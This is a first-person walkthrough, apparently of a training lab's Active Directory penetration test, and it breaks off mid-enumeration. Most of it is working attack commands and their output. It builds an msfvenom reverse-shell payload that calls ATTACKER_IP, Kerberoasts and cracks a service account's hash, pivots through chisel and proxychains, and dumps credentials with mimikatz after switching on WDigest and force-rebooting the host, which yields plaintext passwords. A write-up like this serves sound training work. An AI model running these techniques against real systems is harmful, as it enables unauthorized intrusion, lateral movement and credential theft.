Scenario:
A team member started an External Penetration Test and was moved to another urgent project before they could finish. The team member was able to find and exploit a file upload vulnerability after performing recon of the externally-facing web server. Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd!) in place for us to start from in the /uploads directory. As part of this assessment, our client, Inlanefreight, has authorized us to see how far we can take our foothold and is interested to see what types of high-risk issues exist within the AD environment. Leverage the web shell to gain an initial foothold in the internal network. Enumerate the Active Directory environment looking for flaws and misconfigurations to move laterally and ultimately achieve domain compromise.
Enumeration
- Before switching projects, our teammate left a password-protected web shell (with the credentials: admin:My_W3bsH3ll_P@ssw0rd! in place for us to start from in the /uploads directory.
We have initial credentials
admin:My_W3bsH3ll_P@ssw0rd!Based on the info we have, I browse to the url/uploads:
- When I clicked on the antak.aspx, I was directed to the authentcation page.
Let's try the credentials provided by the team: admin:My_W3bsH3ll_P@ssw0rd!
I was able to log into antak webshell as shown in the image above.
I check
systeminfoto understand the system architecture:
Exploitation
Now my head started spinning on how to pop a reverse shell without metasploit, so I created a base 64 payload with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_Port> -f exe -o shell.exe
Now our payload is ready, we need to upload it to the target:
Start nc listener on my attack machine:
nc -lvnp 4466
In the terminal I then run C:\myshell.exe or whatever the name your payload is named, then I have a shell:
To use native commands, I type powershell in the shell to get into powershell
To know the host identity and domain info I ran
Get-ChildItem Env: | ft key,value
PS C:\> Get-ChildItem Env: | ft key,value
Get-ChildItem Env: | ft key,value
Key Value
--- -----
ALLUSERSPROFILE C:\ProgramData
APP_POOL_CONFIG C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
APP_POOL_ID DefaultAppPool
APPDATA C:\Windows\system32\config\systemprofile\AppData\Roaming
CommonProgramFiles C:\Program Files\Common Files
CommonProgramFiles(x86) C:\Program Files (x86)\Common Files
CommonProgramW6432 C:\Program Files\Common Files
COMPUTERNAME WEB-WIN01
ComSpec C:\Windows\system32\cmd.exe
DriverData C:\Windows\System32\Drivers\DriverData
LOCALAPPDATA C:\Windows\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS 4
OS Windows_NT
Path C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPower...
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
PROCESSOR_ARCHITECTURE AMD64
PROCESSOR_IDENTIFIER AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL 25
PROCESSOR_REVISION 0101
ProgramData C:\ProgramData
ProgramFiles C:\Program Files
ProgramFiles(x86) C:\Program Files (x86)
ProgramW6432 C:\Program Files
PROMPT $P$G
PSExecutionPolicyPreference Bypass
PSModulePath WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32...
PUBLIC C:\Users\Public
SystemDrive C:
SystemRoot C:\Windows
TEMP C:\Windows\TEMP
TMP C:\Windows\TEMP
USERDOMAIN INLANEFREIGHT
USERNAME WEB-WIN01$
USERPROFILE C:\Windows\system32\config\systemprofile
windir C:\Windows
COMPUTERNAME : WEB-WIN01USERDOMAIN : INLANEFREIGHT
👉 Now we Confirm:
- machine name
domain membership
Let's run
route printTo understand network reachability and pivot opportunities
PS C:\> route print
route print
===========================================================================
Interface List
7...00 50 56 94 db 4c ......vmxnet3 Ethernet Adapter #2
3...00 50 56 94 9e af ......vmxnet3 Ethernet Adapter
1...........................Software Loopback Interface 1
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 172.16.6.1 172.16.6.100 11
0.0.0.0 0.0.0.0 10.129.0.1 10.129.25.22 15
10.129.0.0 255.255.0.0 On-link 10.129.25.22 271
10.129.25.22 255.255.255.255 On-link 10.129.25.22 271
10.129.255.255 255.255.255.255 On-link 10.129.25.22 271
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
172.16.0.0 255.255.0.0 On-link 172.16.6.100 266
172.16.6.100 255.255.255.255 On-link 172.16.6.100 266
172.16.255.255 255.255.255.255 On-link 172.16.6.100 266
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 172.16.6.100 266
224.0.0.0 240.0.0.0 On-link 10.129.25.22 271
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
255.255.255.255 255.255.255.255 On-link 172.16.6.100 266
255.255.255.255 255.255.255.255 On-link 10.129.25.22 271
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 172.16.6.1 1
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
3 271 ::/0 fe80::250:56ff:fe94:a0a0
1 331 ::1/128 On-link
3 271 dead:beef::/64 On-link
3 271 dead:beef::202/128 On-link
3 271 dead:beef::15a2:99e7:f7e2:6c05/128
On-link
7 266 fe80::/64 On-link
3 271 fe80::/64 On-link
3 271 fe80::15a2:99e7:f7e2:6c05/128
On-link
7 266 fe80::5425:f5d2:6282:3a53/128
On-link
1 331 ff00::/8 On-link
7 266 ff00::/8 On-link
3 271 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
With the above scan we confirm that this box is dual-homed (connected to two networks)
Two different networks exist:
- 172.16.6.0/16 → internal domain network (Guessing where DC is)
- 10.129.0.0/16 → external network
I tried to download fping but no luck, so I try to check the live hosts within the domain network with the code below.Though it was slow but I got back result:
6..7 | ForEach-Object { $i = $_; 1..254 | ForEach-Object { if (Test-Connection -ComputerName "172.16.$i.$_" -Count 1 -Quiet) { write-host "172.16.$i.$_ is UP" } } }
We got back three ips back including our host ip below:
PS C:\> 6..7 | ForEach-Object { $i = $_; 1..254 | ForEach-Object { if (Test-Connection -ComputerName "172.16.$i.$_" -Count 1 -Quiet) { write-host "172.16.$i.$_ is UP" } } }
172.16.6.3 is UP
172.16.6.50 is UP
172.16.6.100 is UP
Then Check the password policy with net accounts /domain
PS C:\> net accounts /domain
net accounts /domain
The request will be processed at a domain controller for domain INLANEFREIGHT.LOCAL.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 1
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
To step-up our enumeration let's Download and move Powerview to the target and Import-Module:
PS C:\> Import-Module .\PowerView.ps1
Import-Module .\PowerView.ps1
PS C:\> Get-Command Get-DomainUser
Get-Command Get-DomainUser
CommandType Name Version Source
----------- ---- ------- ------
Function Get-DomainUser
Then run Get-DomainUser * -spn | select samaccountname,serviceprincipalname to SPN accounts.
Why do we need check for SPN accounts?
These accounts are:
- service accounts
- tied to services (SQL, IIS, etc.)
- often have privileged access
- frequently have weak or reused passwords
- issued TGS (Ticket Granting Service) tickets
PS C:\> Get-DomainUser * -spn | select samaccountname,serviceprincipalname
Get-DomainUser * -spn | select samaccountname,serviceprincipalname
samaccountname serviceprincipalname
-------------- --------------------
azureconnect adfsconnect/azure01.inlanefreight.local
backupjob backupjob/veam001.inlanefreight.local
krbtgt kadmin/changepw
sqltest MSSQLSvc/DEVTEST.inlanefreight.local:1433
sqlqa MSSQLSvc/QA001.inlanefreight.local:1433
sqldev MSSQLSvc/SQL-DEV01.inlanefreight.local:1433
svc_sql MSSQLSvc/SQL01.inlanefreight.local:1433
sqlprod MSSQLSvc/SQL02.inlanefreight.local:1433
We see that the samaccountname for the SPN in question (MSSQLSvc/SQL01.inlanefreight.local:1433) is svc_sql.
Now we can get the TGS ticket in Hashcat format.
PS C:\> Get-DomainUser * -spn | select samaccountname,serviceprincipalname
Get-DomainUser * -spn | select samaccountname,serviceprincipalname
samaccountname serviceprincipalname
-------------- --------------------
azureconnect adfsconnect/azure01.inlanefreight.local
backupjob backupjob/veam001.inlanefreight.local
krbtgt kadmin/changepw
sqltest MSSQLSvc/DEVTEST.inlanefreight.local:1433
sqlqa MSSQLSvc/QA001.inlanefreight.local:1433
sqldev MSSQLSvc/SQL-DEV01.inlanefreight.local:1433
svc_sql MSSQLSvc/SQL01.inlanefreight.local:1433
sqlprod MSSQLSvc/SQL02.inlanefreight.local:1433
PS C:\> Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser -Identity svc_sql | Get-DomainSPNTicket -Format Hashcat
SamAccountName : svc_sql
DistinguishedName : CN=svc_sql,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
ServicePrincipalName : MSSQLSvc/SQL01.inlanefreight.local:1433
TicketByteHexStream :
Hash : $krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433*$033E72A1673FBECEC2BA32C7311A3407$DBAC70A37D122F20632D9777F49FF1CB87DC3A376E2D61BAE1BF93FAD4E41861A038816559BC11F7F086DDADC3AC8D13073F830621EE5431BD48991721A1B9C018A369EAAACACE5AE53DCC419F58C2DB509D1B28A4D52=44891900AF2D4743CAEA09F79161086BCE3F4399C5995F78163240BFBE6835609E71B74E52AD2A4BC30FBB838A25665AD2BE3B6C9DCBF8A9388C149308D212CB2742F95010E0ADBCC63B5E43A8444D9350BC21D0CCEA2A27DA58461A8F1CD2F00538774511EBBE6319ADAC6CBDFD476ACCA57983A5825BEBA52CD389E149403A500F9E294FEF1182EE08AF444ACCA0A1C14374908D6D84314A823E8CD7AC4449B6A8A2C93E2AA4892978A2692C0B37C697E42CD3F55BF8BD3A395C2F416CA16E
93B4FF7DE4476C2BD7FFC191B4DC79A0B11586E9FD9B379733E5698317EA6EE0FE4DF2B9B26CBF3B30204F7B5F2487314235F93BCA85CB2B7C94B07F1CBEB54DD27FB8A73E44BBB039C28E3C79B61104EBB3BBCABBD00F1B222A08BEA24AFDF890CBCC5B142F630BFD2843030B67F623E389326C9B8E9EBF89AF7B42275D235BD245400F661704368970108B4100A86A7F545762B7E096302A03E3C16640A014189DB39602954E467B2DAA78423C166FC2375DCE11A0228AA111B9A5B510D33D84FD1E5EA39D18184CC0077596DDC7EF3FDF72DB0639796CA5019ECE30F92CB0FC130E5F4246F4ADA8D7914656AFAF229B5D885969D3E07C65F4561784416E9C012D3947DD6E78211EE247BC2DF3133AA3342E7CD0B09822984FBEA866D74D581CFAE2DE1B92830F4E5718A7CA2018FF0C70FBDA20D76393C52F0A15D26D32B2AEE1C3670B978DB0C57C256D3CDBB2BC0A38AC166A53E7E12030F6A39166472F91C20514E5D742267CB23CDCD9C4D709F41768C9082C09D9504DDA8074702DC042B4396F51224BABA0434383F9C8C98AF37C043B240608E8AFAA574CB08F70CE06CBF55115214BDFEF22692E4FBDC1BD7485F150C74152C0EA274EAF53BFB935C8DA5B2B4A1539331E7D4BFDB184257CFD4917DCCC651C349098AFF8DA1DA4C818F29797BB696C674683802FC914508FA879887D47EAE46C2D836F7472B9AC834BB2CAF1859E22705F2ED98CB127AB830F00473B0C0B2A108DC6400FC5E77D597FDBE1462030889DC498223B6A072588805D3CDB8600324EBC2EBCBCD35BFC020D4877316BF8EB9F11582CBA46C16436E14F813A4A5AE3EE0BB16BD07A73FF1B0BC135E95BF6A8FD9B5EFA9DAED725B5DD91F51E6330FDD76BB56116D34DB197D59061D19B21C485F962CD4DBE203C23A2A9203F34ED5C8FA32068061AE528DA2D144D362B501AE5F1CAB79FF516981970DC6FB31E80401A2B7B564E332B76FA564F8BD446C4984D1DD291397FAEC2EF7176399C01EB805FC57C228C42BF23AB6B9C5C8932FC09027A8DF5D8CB646CFBBF2D416D3FF73A04142240352B771E2BFEB150B3190572D570D46F9D1448BE760BC86D607CBE2519EB816A8E0D0E148C249
Let try to crack it with hashcat:
─[eu-academy-1]─[10.10.14.78]─[htb-ac-2510340@htb-hdniwpyvod]─[~]
└──╼ [★]$ hashcat -m 13100 svc_sql /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/SQL01.inlanefreight.local:1433*$033e72a1673fbecec2ba32c7311a3407$dbac70a37d122f20632d9777f49ff1cb87dc3a376e2d61bae1bf93fad4e41861a038816559bc11f7f086ddadc3ac8d13073f830621ee5431bd48991721a1b9c018a369eaaacace5ae53dcc419f58c2db509d1b28a4d5244891900af2d4743caea09f79161086bce3f4399c5995f78163240bfbe6835609e71b74e52ad2a4bc30fbb838a25665ad2be3b6c9dcbf8a9388c149308d212cb2742f95010e0adbcc63b5e43a8444d9350bc21d0ccea2a27da58461a8f1cd2f00538774511ebbe6319adac6cbdfd476acca57983a5825beba52cd389e149403a500f9e294fef1182ee08af444acca0a1c14374908d6d84314a823e8cd7ac4449b6a8a2c93e2aa4892978a2692c0b37c697e42cd3f55bf8bd3a395c2f416ca16e93b4ff7de4476c2bd7ffc191b4dc79a0b11586e9fd9b379733e5698317ea6ee0fe4df2b9b26cbf3b30204f7b5f2487314235f93bca85cb2b7c94b07f1cbeb54dd27fb8a73e44bbb039c28e3c79b61104ebb3bbcabbd00f1b222a08bea24afdf890cbcc5b142f630bfd2843030b67f623e389326c9b8e9ebf89af7b42275d235bd245400f661704368970108b4100a86a7f545762b7e096302a03e3c16640a014189db39602954e467b2daa78423c166fc2375dce11a0228aa111b9a5b510d33d84fd1e5ea39d18184cc0077596ddc7ef3fdf72db0639796ca5019ece30f92cb0fc130e5f4246f4ada8d7914656afaf229b5d885969d3e07c65f4561784416e9c012d3947dd6e78211ee247bc2df3133aa3342e7cd0b09822984fbea866d74d581cfae2de1b92830f4e5718a7ca2018ff0c70fbda20d76393c52f0a15d26d32b2aee1c3670b978db0c57c256d3cdbb2bc0a38ac166a53e7e12030f6a39166472f91c20514e5d742267cb23cdcd9c4d709f41768c9082c09d9504dda8074702dc042b4396f51224baba0434383f9c8c98af37c043b240608e8afaa574cb08f70ce06cbf55115214bdfef22692e4fbdc1bd7485f150c74152c0ea274eaf53bfb935c8da5b2b4a1539331e7d4bfdb184257cfd4917dccc651c349098aff8da1da4c818f29797bb696c674683802fc914508fa879887d47eae46c2d836f7472b9ac834bb2caf1859e22705f2ed98cb127ab830f00473b0c0b2a108dc6400fc5e77d597fdbe1462030889dc498223b6a072588805d3cdb8600324ebc2ebcbcd35bfc020d4877316bf8eb9f11582cba46c16436e14f813a4a5ae3ee0bb16bd07a73ff1b0bc135e95bf6a8fd9b5efa9daed725b5dd91f51e6330fdd76bb56116d34db197d59061d19b21c485f962cd4dbe203c23a2a9203f34ed5c8fa32068061ae528da2d144d362b501ae5f1cab79ff516981970dc6fb31e80401a2b7b564e332b76fa564f8bd446c4984d1dd291397faec2ef7176399c01eb805fc57c228c42bf23ab6b9c5c8932fc09027a8df5d8cb646cfbbf2d416d3ff73a04142240352b771e2bfeb150b3190572d570d46f9d1448be760bc86d607cbe2519eb816a8e0d0e148c249:lucky7
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*svc_sql$INLANEFREIGHT.LOCAL$MSSQLSvc/S...48c249
Time.Started.....: Wed Apr 29 10:27:05 2026 (0 secs)
Time.Estimated...: Wed Apr 29 10:27:05 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#2.........: 691.4 kH/s (2.03ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#2....: 123456 -> lovers1
Started: Wed Apr 29 10:26:56 2026
Stopped: Wed Apr 29 10:27:06 2026
The next question is Submit the contents of the flag.txt file on the Administrator desktop on MS01 so I ran the command below to confirm the MS01 ip address:
PS C:\> Resolve-DnsName MS01
Resolve-DnsName MS01
Name Type TTL Section IPAddress
---- ---- --- ------- ---------
MS01.INLANEFREIGHT.LOCAL A 1200 Answer 172.16.6.50
We are unable to connect directly to the MS01 from our attack box, that means we need to set up proxy server, so I chose chisel
I downloaded chisel, start python3 server on my attack machine and uploaded chisel to the target machine:
PS C:\> Invoke-WebRequest http://10.10.14.30:8080/chisel_windows.exe -OutFile C:\chisel_windows.exe
Then we need to start chisel as server on the target:
PS C:\> ./chisel_windows.exe server -p 1234 --socks5
./chisel_windows.exe server -p 1234 --socks5
2026/05/01 07:23:52 server: Fingerprint WtNKsr+iugPQBM7bYUL4YCYLT4P157tKALSdqDCixpU=
2026/05/01 07:23:52 server: Listening on http://0.0.0.0:1234
2026/05/01 07:24:42 server: session#1: Client version (1.10.0) differs from server version (1.10.1)
Now we can start chisel on our attack machine as client:
─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-nyd2s4irji]─[~]
└──╼ [★]$ chisel client -v 10.129.28.167:1234 socks
2026/05/01 09:24:42 client: Connecting to ws://10.129.28.167:1234
2026/05/01 09:24:42 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2026/05/01 09:24:42 client: tun: Bound proxies
2026/05/01 09:24:42 client: Handshaking...
2026/05/01 09:24:42 client: Sending config
2026/05/01 09:24:42 client: Connected (Latency 1.637637ms)
2026/05/01 09:24:42 client: tun: SSH connected
Because we are running on socks5 we need to modify the /etc/proxychains.conf to match what our attack machine is Listening.... when we start chisel as client 127.0.0.1:1080
Now that our proxy server is set and we confirm the MS01 IP let's use evil_winram into the machine to submite the flag with proxychains flag before our command:
proxychains evil-winrm -i 172.16.6.50 -u svc_sql -p lucky7
We can also RDP into the host:
proxychains xfreerdp /v:<Server_IP> /u:<Username> /p:<Password> /size:1920x1080
While enumerting MS01 I noticed another user:
PS C:\> query user
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
tpetty console 1 Active none 5/1/2026 4:34 AM
svc_sql rdp-tcp#2 2 Active 1:16 5/1/2026 5:41 AM
Let's upload mimikatz to see if we can get plain text password for the same user on the host:
PS C:\> upload /home/htb-ac-2510340/mimikatz.exe
Info: Uploading /home/htb-ac-2510340/mimikatz.exe to C:\\mimikatz.exe
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
Info: Upload successful!
Let's run mimikatz with these flags "privilege::debug" "sekurlsa::logonpasswords":
PS C:\> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 1285573 (00000000:00139dc5)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 5/1/2026 5:41:36 AM
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : MS01$
* Domain : INLANEFREIGHT
* NTLM : 8fbaa4a365f38f8148230a72efe206d3
* SHA1 : bed51be11137d6ea159e1952b768de1f04171903
tspkg :
wdigest :
* Username : MS01$
* Domain : INLANEFREIGHT
* Password : (null)
kerberos :
* Username : MS01$
* Domain : INLANEFREIGHT.LOCAL
* Password : f9 60 d9 d2 54 6c d4 dc 9b b6 db 18 48 6a c0 a0 22 37 b7 ee fc 49 d9 30 a5 8c e2 8c ef 62 82 f0 79 78 4b 53 b7 8d a3 fa a3 bd d6 9c a6 6d 44 01 cf 96 b1 5e 45 c6 91 68 08 d4 c9 f3 37 91 09 13 e9 09 63 bd ad e0 21 26 81 d6 57 ab af 26 01 1a 7b 6c 0d 45 87 97 31 84 ec 80 36 b1 23 1f b2 a5 68 c8 81 e1 d0 ac b5 61 a9 4d b0 b6 55 1f ba 89 cf 68 bc a8 2d 4d fd 03 8e 93 b3 b2 1f d8 43 f9 c0 42 5c 29 ce 5d 63 53 81 f6 08 81 d7 af 74 98 84 3e 81 a7 9c 15 a9 0e db af df f2 15 27 1a 81 6b 67 2f 65 07 cc 4c 39 60 51 1c 54 44 33 c7 f0 ed 1b 86 0b a9 3f 07 54 eb a2 e9 a3 f3 63 dc a7 8b 15 57 38 ac 6d 7d 74 4b f3 92 1f 61 68 33 49 a8 1b fd 96 3f a0 d0 a3 3b 7f 54 b8 8b 9e cc 6f 60 85 b4 77 3f f4 f5 3f a3 ee d2 70 32 d6 c8 57
ssp :
credman :
Authentication Id : 0 ; 72704 (00000000:00011c00)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/1/2026 4:33:22 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : MS01$
* Domain : INLANEFREIGHT
* NTLM : 8fbaa4a365f38f8148230a72efe206d3
* SHA1 : bed51be11137d6ea159e1952b768de1f04171903
tspkg :
wdigest :
* Username : MS01$
* Domain : INLANEFREIGHT
* Password : (null)
kerberos :
* Username : MS01$
* Domain : INLANEFREIGHT.LOCAL
* Password : f9 60 d9 d2 54 6c d4 dc 9b b6 db 18 48 6a c0 a0 22 37 b7 ee fc 49 d9 30 a5 8c e2 8c ef 62 82 f0 79 78 4b 53 b7 8d a3 fa a3 bd d6 9c a6 6d 44 01 cf 96 b1 5e 45 c6 91 68 08 d4 c9 f3 37 91 09 13 e9 09 63 bd ad e0 21 26 81 d6 57 ab af 26 01 1a 7b 6c 0d 45 87 97 31 84 ec 80 36 b1 23 1f b2 a5 68 c8 81 e1 d0 ac b5 61 a9 4d b0 b6 55 1f ba 89 cf 68 bc a8 2d 4d fd 03 8e 93 b3 b2 1f d8 43 f9 c0 42 5c 29 ce 5d 63 53 81 f6 08 81 d7 af 74 98 84 3e 81 a7 9c 15 a9 0e db af df f2 15 27 1a 81 6b 67 2f 65 07 cc 4c 39 60 51 1c 54 44 33 c7 f0 ed 1b 86 0b a9 3f 07 54 eb a2 e9 a3 f3 63 dc a7 8b 15 57 38 ac 6d 7d 74 4b f3 92 1f 61 68 33 49 a8 1b fd 96 3f a0 d0 a3 3b 7f 54 b8 8b 9e cc 6f 60 85 b4 77 3f f4 f5 3f a3 ee d2 70 32 d6 c8 57
ssp :
credman :
Authentication Id : 0 ; 1308030 (00000000:0013f57e)
Session : RemoteInteractive from 2
User Name : svc_sql
Domain : INLANEFREIGHT
Logon Server : DC01
Logon Time : 5/1/2026 5:41:37 AM
SID : S-1-5-21-2270287766-1317258649-2146029398-4608
msv :
[00000003] Primary
* Username : svc_sql
* Domain : INLANEFREIGHT
* NTLM : dc3ba1d16d82ac977eea8c22c5de3f82
* SHA1 : c052c598aaed303e20658a4a6341320867d8dcc4
* DPAPI : 32d87218d6331c60d8448418e504b7df
tspkg :
wdigest :
* Username : svc_sql
* Domain : INLANEFREIGHT
* Password : (null)
kerberos :
* Username : svc_sql
* Domain : INLANEFREIGHT.LOCAL
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!
We got back some NTLM hash but the user we are after has NULL as password. Let's enable WDigest protocol to and try again to see if we would get lucky. Still on the host:172.16.6.50:
PS C:\Users\svc_sql.INLANEFREIGHT\Documents> reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
The operation completed successfully.
Then restart:
PS C:\Users\svc_sql.INLANEFREIGHT\Documents> shutdown.exe /r /t 0 /f
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
Now let's try mimikatz again:
PS C:\Users\svc_sql.INLANEFREIGHT\Documents> .\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 55262 (00000000:0000d7de)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 5/1/2026 9:40:36 AM
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : MS01$
* Domain : INLANEFREIGHT
* NTLM : 2951b92fba38c91eb04c39752106d237
* SHA1 : ae7ad0461a1f52dec0dfc42d44d939af1d3e7e75
tspkg :
wdigest :
* Username : MS01$
* Domain : INLANEFREIGHT
* Password : 38 be 36 a5 5f 82 b1 15 9c 1e a7 1e 3c 2f cf 0e 7e 83 32 e1 52 58 4b d2 11 00 a9 9d 22 e1 00 59 3d 58 23 11 27 fd 1c 9e 5d 99 6e 63 c5 94 5f e4 f4 d5 09 75 e3 b8 60 f9 7b d8 89 31 d4 5c 64 08 6a 29 6f 73 43 ed 38 84 f5 ce 0c 6d a1 48 70 36 89 2d 32 f5 32 81 dd 50 dd 1d 13 3e 5d 48 66 dd 1e 05 b2 4e 13 9c d4 b1 5e 56 d3 d8 c1 57 5e 2f 5f e0 01 ad 3f 4b 15 d3 df 50 77 c1 5b f4 60 76 ae 4a 15 bf ec b3 cc 75 42 9b 8f 7f fb 50 3e fb 73 c7 45 00 18 dd d7 7f a8 3b 83 5a 0f 35 bc bc cf 5d a0 ac f7 fd 2c e8 7c 0b bc 51 c3 42 10 a6 86 c4 75 0a 10 71 50 fb 58 15 78 f3 21 44 53 58 b9 71 ba 48 67 fc 03 b2 36 a2 e5 c5 d9 c4 98 da dc 9c 5c 44 94 45 18 ed 25 af e8 a9 9f 04 38 45 7b 65 48 e7 69 17 07 48 b4 51 24 e2 1a e0 99 84
kerberos :
* Username : MS01$
* Domain : INLANEFREIGHT.LOCAL
* Password : 38 be 36 a5 5f 82 b1 15 9c 1e a7 1e 3c 2f cf 0e 7e 83 32 e1 52 58 4b d2 11 00 a9 9d 22 e1 00 59 3d 58 23 11 27 fd 1c 9e 5d 99 6e 63 c5 94 5f e4 f4 d5 09 75 e3 b8 60 f9 7b d8 89 31 d4 5c 64 08 6a 29 6f 73 43 ed 38 84 f5 ce 0c 6d a1 48 70 36 89 2d 32 f5 32 81 dd 50 dd 1d 13 3e 5d 48 66 dd 1e 05 b2 4e 13 9c d4 b1 5e 56 d3 d8 c1 57 5e 2f 5f e0 01 ad 3f 4b 15 d3 df 50 77 c1 5b f4 60 76 ae 4a 15 bf ec b3 cc 75 42 9b 8f 7f fb 50 3e fb 73 c7 45 00 18 dd d7 7f a8 3b 83 5a 0f 35 bc bc cf 5d a0 ac f7 fd 2c e8 7c 0b bc 51 c3 42 10 a6 86 c4 75 0a 10 71 50 fb 58 15 78 f3 21 44 53 58 b9 71 ba 48 67 fc 03 b2 36 a2 e5 c5 d9 c4 98 da dc 9c 5c 44 94 45 18 ed 25 af e8 a9 9f 04 38 45 7b 65 48 e7 69 17 07 48 b4 51 24 e2 1a e0 99 84
ssp :
credman :
Authentication Id : 0 ; 170825 (00000000:00029b49)
Session : Interactive from 1
User Name : tpetty
Domain : INLANEFREIGHT
Logon Server : DC01
Logon Time : 5/1/2026 9:40:40 AM
SID : S-1-5-21-2270287766-1317258649-2146029398-4607
msv :
[00000003] Primary
* Username : tpetty
* Domain : INLANEFREIGHT
* NTLM : fd37b6fec5704cadabb319cebf9e3a3a
* SHA1 : 38afea42a5e28220474839558f073979645a1192
* DPAPI : da2ec07551ab1602b7468db08b41e3b2
tspkg :
wdigest :
* Username : tpetty
* Domain : INLANEFREIGHT
* Password : Sup3rS3cur3D0m@inU2eR
kerberos :
* Username : tpetty
* Domain : INLANEFREIGHT.LOCAL
* Password : (null)
ssp :
credman :
mimikatz(commandline) # exit
Bye!
Now we got back plain text password:Sup3rS3cur3D0m@inU2eR for:tpetty
Let's check what the user can do:
PS C:\Users\tpetty> Import-Module .\PowerView.ps1
PS C:\Users\tpetty> $sid = Convert-NameToSid tpetty
